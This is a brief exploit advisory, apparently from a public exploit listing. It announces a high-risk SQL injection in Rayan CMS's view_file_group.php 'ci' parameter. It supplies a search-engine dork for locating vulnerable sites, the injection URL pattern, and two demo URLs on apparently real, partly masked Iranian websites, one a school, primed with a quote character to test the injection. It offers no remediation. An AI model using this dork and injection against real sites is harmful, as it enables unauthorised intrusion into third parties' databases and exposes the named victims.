[+] Sql Injection on Rayan CMS
[+] Date: 26/05/2014
[+] Risk: High
[+] Author: Ir-pishva
[+] Vendor Homepage: http://www.rayancms.com
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7
[+] Vulnerable File: uploaded/view_file_group.php
[+} Dork : intext:"Powered ByRayan CMS"
[+] Exploit : http://host/site/uploaded/view_file_group.php?ci=[SQL Injection]
[+] Demo1:http://sheraXfatschool.ir/uploaded/view_file_group.php?ci=10'
[+] Demo2:http://squasXkhorasan.ir/uploaded/view_file_group.php?ci=6'